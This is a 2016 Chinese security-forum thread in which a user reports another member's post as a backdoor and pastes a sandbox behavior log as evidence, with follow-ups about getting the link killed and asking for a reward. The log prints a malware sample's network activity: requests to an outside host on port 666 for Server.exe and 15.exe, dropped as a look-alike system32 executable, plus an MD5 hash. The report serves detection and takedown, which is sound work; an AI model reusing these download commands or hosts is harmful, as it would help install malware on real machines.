墨客安全网投诉建议社区综合事务处举报后门帖子举报人：134679（我是雷锋不用谢）被举报人：aimieimong0 理由：举报后门链接：https://www.hloday.com/thread-2221-1-1.html带证据：网络行为MD5：关键性链 ...

134679 发表于 2016-3-15 12:04:52

举报后门帖子

举报人：134679（我是雷锋不用谢）
被举报人：aimieimong0
理由：举报后门
链接：https://www.hloday.com/thread-2221-1-1.html

带证据：网络行为
行为描述：联网打开网址
详情信息：InternetOpenUrlA: http://<FAKE_SERVER_IP>:128/wpad.dat, hInternet = 0x00cc0010, Flags = 0x00000010
行为描述：下载文件
详情信息：C:\WINDOWS\system32\thundet.exe                            URLDownloadToFileW: http://222.186.58.164:666/Server.exe ---> c:\windows\system32\thundet.exe
行为描述：连接指定站点
详情信息：InternetConnectA: ServerName = 222.186.58.164, PORT = 666, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000                            InternetConnectA: ServerName = <FAKE_SERVER_IP>, PORT = 128, UserName = , Password = , hSession = 0x00cc0010, hConnect = 0x00cc0014, Flags = 0x00000010
行为描述：打开HTTP连接
详情信息：InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489), hSession = 0x00cc0004                            InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0), hSession = 0x00cc0010
行为描述：建立到一个指定的套接字连接
详情信息：URL: wpad, IP: <FAKE_SERVER_IP>:128, SOCKET = 0x00000510                            URL: , IP: 222.186.58.164:666, SOCKET = 0x00000514                            URL: , IP: 222.186.58.164:666, SOCKET = 0x0000050c                            URL: , IP: 192.168.0.100:8080, SOCKET = 0x00000500
行为描述：读取网络文件
详情信息：hFile = 0x00cc0018, BytesToRead =4010, BytesRead = 4010.                               hFile = 0x00cc000c, BytesToRead =2048, BytesRead = 2048.
行为描述：发送HTTP包
详情信息：GET /wpad.dat HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0) Host: <FAKE_SERVER_IP>:128                            GET /15.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: 222.186.58.164:666 Connection: Keep-Alive                            GET /Server.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: 222.186.58.164:666 Connection: Keep-Alive
行为描述：打开HTTP请求
详情信息：HttpOpenRequestA: 222.186.58.164:666/15.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010                            HttpOpenRequestA: <FAKE_SERVER_IP>:128/wpad.dat, hConnect = 0x00cc0014, hRequest = 0x00cc0018, Verb: GET, Referer: , Flags = 0x00000010                            HttpOpenRequestA: 222.186.58.164:666/server.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
行为描述：按名称获取主机地址
详情信息：GetAddrInfoW: computer                            GetAddrInfoW: wpad
MD5：
0a795b1c248ca30b0b281260f72a05dc

关键性链接
下载文件
详情信息：C:\WINDOWS\system32\thundet.exe                            URLDownloadToFileW: http://222.186.58.164:666/Server.exe ---> c:\windows\system32\thundet.exe

134679 发表于 2016-3-15 12:05:55

还有此链接被我打死了哈哈哈哈

134679 发表于 2016-3-27 20:58:18

我发这个没奖励吗？？？？

页: [1]

墨客安全网's Archiver

举报后门帖子